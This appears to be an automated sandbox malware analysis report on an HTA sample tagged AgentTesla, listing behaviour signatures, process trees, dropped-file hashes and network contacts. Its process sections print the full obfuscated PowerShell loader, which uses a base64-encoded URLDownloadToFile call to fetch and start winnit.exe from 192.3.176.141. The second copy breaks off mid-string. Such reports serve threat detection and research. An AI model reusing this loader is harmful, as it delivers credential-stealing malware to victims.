Malware Analysis Report

2024-12-07 14:10

Sample ID 241112-htsjzaxelr
Target creatingnextleeverthingswithentireprocessgetitinonlineback.hta
SHA256 204746f8c96c400d222b811d71cbb1f4adcb684eb432efb25d648a8828922e26
Tags
agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

204746f8c96c400d222b811d71cbb1f4adcb684eb432efb25d648a8828922e26

Threat Level: Known bad

The file creatingnextleeverthingswithentireprocessgetitinonlineback.hta was found to be: Known bad.

Malicious Activity Summary

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan upx

AgentTesla

Agenttesla family

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

AutoIT Executable

Suspicious use of SetThreadContext

UPX packed file

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 07:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 07:02

Reported

2024-11-12 07:04

Platform

win7-20240903-en

Max time kernel

119s

Max time network

125s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2688 set thread context of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2080 wrote to memory of 1792 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2080 wrote to memory of 1792 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2080 wrote to memory of 1792 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 2080 wrote to memory of 1792 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 1792 wrote to memory of 1664 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 1664 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 1664 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 1664 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 2820 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1792 wrote to memory of 2820 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1792 wrote to memory of 2820 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1792 wrote to memory of 2820 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2820 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2820 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2820 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2820 wrote to memory of 2804 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1792 wrote to memory of 2688 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 1792 wrote to memory of 2688 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 1792 wrote to memory of 2688 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 1792 wrote to memory of 2688 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2688 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta"

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'JFA4OFdJYWNrc1AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYmVSREVGaU5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVFhndHZ0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElCcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hhaExkWVRmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG94Y1NTY0FSKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaHBBY3JBVXAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlZalRCc0pMcmx6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQODhXSWFja3NQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MC93aW5uaXQuZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U1RBcnQtc0xlRVAoMyk7U3RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[cHaR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxac5_nc.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCED4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCED3.tmp"

C:\Users\Admin\AppData\Roaming\winnit.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\winnit.exe"

Network

Country Destination Domain Proto
US 192.3.176.141:80 192.3.176.141 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 16aab4b2935658f831582a9054bee876
SHA1 6d83b0b4609275c619b2d4cb154bcfb68bb5a6e0
SHA256 5001ff5cb95547fde49a67bd259610c0af854debb5294b5790ee2095eef10b83
SHA512 4c230b99a68ef428f16d3230b28823f8a531752b613995d811e70fe744b6e076d2d6266921d18f2dda4179445cb19287f08f891c65aec4132c8c129ba745e4c7

\??\c:\Users\Admin\AppData\Local\Temp\sxac5_nc.cmdline

MD5 8264948b00211174301f0847ee00f84e
SHA1 5f611c045f2907a3924374f3498fc0c896b3a603
SHA256 d7fe8ef700deba4b60809f4298e6c665b04aa7b584e76856cfe81b43a9b655fb
SHA512 f2bfc3ddd4991edfe8597e5a46361892d05df07d5b2cedb8e38a8a61c95737c3c080c7857f2c7caee2072d742b59f76719ea9c95bf1ad00211b166031ada9dd5

\??\c:\Users\Admin\AppData\Local\Temp\sxac5_nc.0.cs

MD5 465b4325ef1dc4adfed6e9822e476e55
SHA1 2fa23c543ae1210d7b44ed6410522ccb5671e001
SHA256 ba069a73c9bf86bc2bc6bfc8532e250817a987761f5ff33d9816c3581efa196c
SHA512 6acd9cdd680e29d3f81813a4011cd0252f0132834393a3c2b40e9ece2c9173accc46eccd29eb9712af8042a0e97472be8a2a265301742612aab28cb8a0f2c1e8

C:\Users\Admin\AppData\Local\Temp\RESCED4.tmp

MD5 1cdcb100a9fdf02707b589a93bdc7069
SHA1 4ce94f74afdc0b4b8d4b83510bbe1ac085fd513d
SHA256 73394b6df1433cade63a06ac85f2998dd4b174da695e79e6f2512744c29109bd
SHA512 fcd3afc2e4e3068edad1be0f556575333eb32d12460e9083285e5a5b8f4aadc85d18df63d5c88ab47a28747428ccb0ec3f1a81ce61a25957a421095dae9072c6

\??\c:\Users\Admin\AppData\Local\Temp\CSCCED3.tmp

MD5 c507b1d21d78efdb602804e9edd49605
SHA1 de24aad7bbc793222f9738fdac7e6397996cdb51
SHA256 4d6318240894d4c14b10e9d27709fcffce7ed48e508a2f3a6789db739c1c945e
SHA512 c3d39b226090d827e2e2962067a02fed11cd125375929288868ebc7ea8f0ed013b518a146150006c03643fec61702cf08348bb1a849c2c9853d9086b2f9679fc

C:\Users\Admin\AppData\Local\Temp\sxac5_nc.dll

MD5 ffde0009a2622000f3283d0f22c30651
SHA1 ac99781d54a4f730c23c13845d101e671ca5ad26
SHA256 81415573a73028ad192f9c30d5c362fa72589d1c7a7851d8a128cb0f686c2beb
SHA512 0eef627022e5376aee616d9e9fd1b8b08e4a16a2e8b628b40936bb88f5dd622650e06ac90102d06b32ef95fce81a10064317bbaf2b6a795b4cc0626871b374e4

C:\Users\Admin\AppData\Local\Temp\sxac5_nc.pdb

MD5 ac1fccc746d6fd7f9acebb6cc410ce08
SHA1 f4a6fb7393009b8cf2227aacd8e69aa147c0d88b
SHA256 34f807ca8e8756edb708ee874083928cede95d0f31ec61026866eb1658ea336f
SHA512 75aa07a4a4ca0ca3a59d7e7dde0b3222c99a03b0ccac9958a357b9d0efd4130cd2d55660a1bf5ca55da79600d31089cc9f5f761bdfdfddd437be784bde501e71

C:\Users\Admin\AppData\Roaming\winnit.exe

MD5 ed7480dfd2d2fd5742d7b4eff9c1d26d
SHA1 5a69a5ec59e9bfcd221ca0925d774516debfdf4b
SHA256 166fec0187fb56dd61b937fa2c903a762102e1c139b47682eafa4cce0e991e7d
SHA512 f19a8832f998225d0f1043422f6800377fcf7dda282ba88c8d333d3734a884eccadf28babd70ae7f9f249c29355b237dd690c03d74e207fbe6e12c866255270b

memory/1792-31-0x0000000006640000-0x000000000684D000-memory.dmp

memory/2688-33-0x0000000000D20000-0x0000000000F2D000-memory.dmp

memory/2428-35-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2428-36-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2688-38-0x0000000000D20000-0x0000000000F2D000-memory.dmp

memory/2428-39-0x0000000000360000-0x00000000003B4000-memory.dmp

memory/2428-40-0x0000000000450000-0x00000000004A2000-memory.dmp

memory/2428-56-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-100-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-98-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-96-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-94-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-92-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-90-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-88-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-86-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-84-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-82-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-80-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-78-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-76-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-74-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-72-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-70-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-68-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-66-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-62-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-60-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-58-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-54-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-52-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-50-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-48-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-46-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-44-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-42-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-64-0x0000000000450000-0x000000000049D000-memory.dmp

memory/2428-41-0x0000000000450000-0x000000000049D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 07:02

Reported

2024-11-12 07:04

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4280 set thread context of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\winnit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\winnit.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4856 wrote to memory of 3064 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 4856 wrote to memory of 3064 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 4856 wrote to memory of 3064 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe
PID 3064 wrote to memory of 4500 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4500 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 4500 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 1196 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3064 wrote to memory of 1196 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3064 wrote to memory of 1196 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 1196 wrote to memory of 3632 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1196 wrote to memory of 3632 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1196 wrote to memory of 3632 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3064 wrote to memory of 4280 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 3064 wrote to memory of 4280 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 3064 wrote to memory of 4280 N/A C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe C:\Users\Admin\AppData\Roaming\winnit.exe
PID 4280 wrote to memory of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4280 wrote to memory of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4280 wrote to memory of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4280 wrote to memory of 784 N/A C:\Users\Admin\AppData\Roaming\winnit.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingnextleeverthingswithentireprocessgetitinonlineback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\windowspOWeRsheLl\v1.0\powERsHeLl.eXe

"C:\Windows\SysTEm32\windowspOWeRsheLl\v1.0\powERsHeLl.eXe" "pOWeRSHelL -Ex bypasS -NOp -w 1 -C DEViCEcReDeNtiALdEpLOYMeNT ; iex($(iEX('[SystEm.TEXT.eNCodIng]'+[ChAR]58+[CHAR]0x3A+'uTf8.GetStRinG([SysteM.cOnveRt]'+[CHaR]58+[CHAr]58+'FroMbASe64STRinG('+[Char]34+'JFA4OFdJYWNrc1AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYmVSREVGaU5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVFhndHZ0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElCcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Tix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hhaExkWVRmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG94Y1NTY0FSKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaHBBY3JBVXAiICAgICAgICAgICAgICAgICAgICAgICAgICAgIC